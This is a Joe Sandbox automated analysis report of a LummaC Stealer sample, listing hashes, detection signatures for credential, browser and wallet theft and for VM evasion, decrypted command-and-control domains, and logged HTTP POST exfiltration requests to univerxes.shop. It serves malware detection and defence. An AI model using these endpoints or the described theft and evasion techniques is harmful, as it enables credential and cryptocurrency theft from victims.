Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
biyhoksefdad.exe

Overview

General Information

Sample name:biyhoksefdad.exe
Analysis ID:1635456
MD5:67af8a00aba060d6508df2389989d85d
SHA1:455950022329a0fde1bd4c3e050f1635464cdb51
SHA256:70870a58aa5a47c9cb1e913883e8c7e08fb49c9018dc08e05af3cad3dad203d8
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • biyhoksefdad.exe (PID: 8332 cmdline: "C:\Users\user\Desktop\biyhoksefdad.exe" MD5: 67AF8A00ABA060D6508DF2389989D85D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: biyhoksefdad.exe PID: 8332JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: biyhoksefdad.exe PID: 8332JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.biyhoksefdad.exe.a80000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-11T17:29:05.556677+010020283713Unknown Traffic192.168.2.549708149.154.167.99443TCP
              2025-03-11T17:29:07.267963+010020283713Unknown Traffic192.168.2.549709172.67.213.171443TCP
              2025-03-11T17:29:09.470403+010020283713Unknown Traffic192.168.2.549710172.67.213.171443TCP
              2025-03-11T17:29:14.328987+010020283713Unknown Traffic192.168.2.549711172.67.213.171443TCP
              2025-03-11T17:29:18.163033+010020283713Unknown Traffic192.168.2.549712172.67.213.171443TCP
              2025-03-11T17:29:22.334502+010020283713Unknown Traffic192.168.2.549713172.67.213.171443TCP
              2025-03-11T17:29:27.454739+010020283713Unknown Traffic192.168.2.549715172.67.213.171443TCP
              2025-03-11T17:29:31.085947+010020283713Unknown Traffic192.168.2.549716172.67.213.171443TCP
              2025-03-11T17:29:35.252998+010020283713Unknown Traffic192.168.2.549718172.67.213.171443TCP
              2025-03-11T17:29:37.690865+010020283713Unknown Traffic192.168.2.549720104.73.234.102443TCP
              2025-03-11T17:29:41.054063+010020283713Unknown Traffic192.168.2.549722104.73.234.102443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: biyhoksefdad.exeAvira: detected
              Antivirus detection for URL or domain
              Source: https://catterjur.run/boSnzhusAvira URL Cloud: Label: malware
              Source: https://arisechairedd.shop/Avira URL Cloud: Label: malware
              Source: https://garagedrootz.top/E1oAvira URL Cloud: Label: malware
              Source: https://catterjur.run/)Avira URL Cloud: Label: malware
              Source: https://sterpickced.digital/zAvira URL Cloud: Label: malware
              Source: https://sterpickced.digital/vAvira URL Cloud: Label: malware
              Source: https://catterjur.run/Avira URL Cloud: Label: malware
              Source: https://modelshiverd.icu/Avira URL Cloud: Label: malware
              Multi AV Scanner detection for submitted file
              Source: biyhoksefdad.exeReversingLabs: Detection: 68%
              Source: biyhoksefdad.exeVirustotal: Detection: 60%Perma Link
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: univerxes.shop/SwnNW
              Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: begindecafer.world/QwdZdf
              Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: garagedrootz.top/oPsoJAN
              Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: modelshiverd.icu/bJhnsj
              Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: arisechairedd.shop/JnsHY
              Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: catterjur.run/boSnzhu
              Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: orangemyther.live/IozZ
              Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: fostinjec.today/LksNAz
              Source: biyhoksefdad.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:49722 version: TLS 1.2
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: number of queries: 1001
              Source: global trafficHTTP traffic detected: GET /kz_prokla2 HTTP/1.1Connection: Keep-AliveHost: t.me
              Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
              Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 149.154.167.99:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.213.171:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.213.171:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 104.73.234.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.213.171:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.213.171:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.213.171:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.213.171:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.213.171:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.73.234.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 172.67.213.171:443
              Source: global trafficHTTP traffic detected: POST /SwnNW HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: univerxes.shop
              Source: global trafficHTTP traffic detected: POST /SwnNW HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=75lRdx7wLp1tS9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14917Host: univerxes.shop
              Source: global trafficHTTP traffic detected: POST /SwnNW HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=fI28nppP3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: univerxes.shop
              Source: global trafficHTTP traffic detected: POST /SwnNW HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=q2478UI0qTxbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20545Host: univerxes.shop
              Source: global trafficHTTP traffic detected: POST /SwnNW HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q73r4i0A0ZxSZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2473Host: univerxes.shop
              Source: global trafficHTTP traffic detected: POST /SwnNW HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4A9KU35TST2zC59CJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571127Host: univerxes.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /kz_prokla2 HTTP/1.1Connection: Keep-AliveHost: t.me
              Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
              Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
              Source: biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cdf4d9cf365335b2c152b7982a59e4c1e; path=/; secure; HttpOnly; SameSite=Nonesessionid=67aa18c404e8cbddfae059fa; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 11 Mar 2025 16:29:41 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: t.me
              Source: global trafficDNS traffic detected: DNS query: univerxes.shop
              Source: global trafficDNS traffic detected: DNS query: begindecafer.world
              Source: global trafficDNS traffic detected: DNS query: garagedrootz.top
              Source: global trafficDNS traffic detected: DNS query: modelshiverd.icu
              Source: global trafficDNS traffic detected: DNS query: arisechairedd.shop
              Source: global trafficDNS traffic detected: DNS query: catterjur.run
              Source: global trafficDNS traffic detected: DNS query: orangemyther.live
              Source: global trafficDNS traffic detected: DNS query: fostinjec.today
              Source: global trafficDNS traffic detected: DNS query: sterpickced.digital
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: unknownHTTP traffic detected: POST /SwnNW HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: univerxes.shop
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000C46000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
              Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arisechairedd.shop/
              Source: biyhoksefdad.exe, 00000000.00000003.1492041549.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://catterjur.run/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://catterjur.run/)
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://catterjur.run/boSnzhu
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://catterjur.run/boSnzhus
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=3Cj4p8f8gr
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&am
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=e
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
